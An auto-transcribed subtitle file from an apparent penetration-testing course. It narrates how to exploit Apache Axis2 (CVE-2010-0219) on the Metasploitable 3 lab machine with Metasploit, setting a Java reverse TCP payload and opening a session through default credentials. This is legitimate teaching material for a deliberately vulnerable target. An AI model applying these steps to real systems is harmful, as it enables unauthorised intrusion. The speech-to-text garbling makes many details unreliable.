1
00:00:00,430 --> 00:00:03,790
So list the FTP services on medicolegal three again.

2
00:00:08,410 --> 00:00:13,660
And this time you can work on the service that runs on Port 82 82.

3
00:00:15,450 --> 00:00:23,250
Now it's due to be in HTP service, so I will try to reach it from my browser to display the application

4
00:00:23,250 --> 00:00:24,390
that runs on this port.

5
00:00:26,590 --> 00:00:30,250
And this is an Apache Tomcat help interface.

6
00:00:32,060 --> 00:00:39,860
So at first, I think that the default Tomcat user name and password might probably work well here.

7
00:00:41,250 --> 00:00:45,330
But unfortunately, it's not, so let's find another way.

8
00:00:45,690 --> 00:00:46,680
There's always another way.

9
00:00:47,730 --> 00:00:50,790
And we'll go back to the MSF council.

10
00:00:52,660 --> 00:01:02,750
So, of course, you can always check the Nessa's result for Port 82, 82 s p 82, 82, and then two

11
00:01:02,770 --> 00:01:03,400
to 10.

12
00:01:06,210 --> 00:01:12,210
Now, have a look at that, there are some findings that you should analyze pretty carefully.

13
00:01:13,580 --> 00:01:20,660
When you look into the vulnerability list, you see this line with a patchy access to detection.

14
00:01:22,130 --> 00:01:24,260
So this finding is is relatively new.

15
00:01:25,340 --> 00:01:27,800
So let's open up your browser and look for.

16
00:01:28,930 --> 00:01:30,730
Access to exploit.

17
00:01:34,180 --> 00:01:38,890
And click here to display the civic code about the Apache access to.

18
00:01:40,150 --> 00:01:41,790
Right, so there are six codes here.

19
00:01:43,200 --> 00:01:47,610
That, as you also can see the score, the last one is really high.

20
00:01:48,740 --> 00:01:52,070
So let's look for this KVI echoed in Métis Point.

21
00:01:53,310 --> 00:01:56,070
But you can always widen your search to search all.

22
00:01:57,320 --> 00:01:59,540
So let's go back into the MSF council.

23
00:02:01,190 --> 00:02:09,110
And search for TV code two zero one zero, dash zero two one nine, and there are two modules for this

24
00:02:09,110 --> 00:02:09,470
code.

25
00:02:10,740 --> 00:02:16,650
Now, if you are familiar with the MSF structure, you can immediately see the first one is a brute

26
00:02:16,650 --> 00:02:24,740
force module to detect Ilagan, OK, and the second one is an exploit with such login information.

27
00:02:26,430 --> 00:02:32,700
So let's have a look at the module information info and the exploit module name.

28
00:02:35,270 --> 00:02:39,140
And if you look at the variable section, you will see a path variable.

29
00:02:40,130 --> 00:02:44,540
So until now, you haven't verified if there is a vulnerability.

30
00:02:46,050 --> 00:02:49,140
So to be sure that that's the exploit we want to use.

31
00:02:50,070 --> 00:02:54,570
Let's go to that path from my browser to verify the path.

32
00:02:55,820 --> 00:02:58,190
So why you go ahead and do this to open your browser now?

33
00:02:59,050 --> 00:03:08,110
And go to the address, tenderfeet tend to then call in eight to eight to forego access to.

34
00:03:09,380 --> 00:03:10,310
And sure enough.

35
00:03:11,260 --> 00:03:18,640
So let's click on the administration link and, well, I think this is the administration page.

36
00:03:19,900 --> 00:03:21,640
So let's go back to MSF consul.

37
00:03:23,280 --> 00:03:24,660
And you can use this XPoint.

38
00:03:27,430 --> 00:03:28,540
Show the options.

39
00:03:30,140 --> 00:03:34,160
Set our host to ten point ten to ten.

40
00:03:35,340 --> 00:03:38,720
That our airport to eight to eight to.

41
00:03:39,940 --> 00:03:42,070
So available payloads for this module.

42
00:03:43,930 --> 00:03:46,600
OK, set payload to.

43
00:03:47,510 --> 00:03:51,340
Java interpreter reverse TCP.

44
00:03:52,220 --> 00:03:56,720
Set elbows for this reverse connection to my colleagues i.p.

45
00:03:57,630 --> 00:04:00,750
And I'll set airport to 82, 82.

46
00:04:01,990 --> 00:04:08,830
So I'm pretty sure I said everything, but just to be sure, let's check one more time, show the options

47
00:04:08,830 --> 00:04:13,810
again and everything looks good, so let's exploit.

48
00:04:15,910 --> 00:04:23,350
And as you see the module log in with the default access user information and you know, it's a good

49
00:04:23,350 --> 00:04:29,260
thing to get in the practice of is you can add this information to your dictionary file format.

50
00:04:29,260 --> 00:04:30,130
Exploitable three.

51
00:04:31,560 --> 00:04:33,270
So the session opened.

52
00:04:34,200 --> 00:04:38,070
So let's get UID and this info.

53
00:04:39,730 --> 00:04:44,650
And you've got another successful session on Métis Voidable three, good job.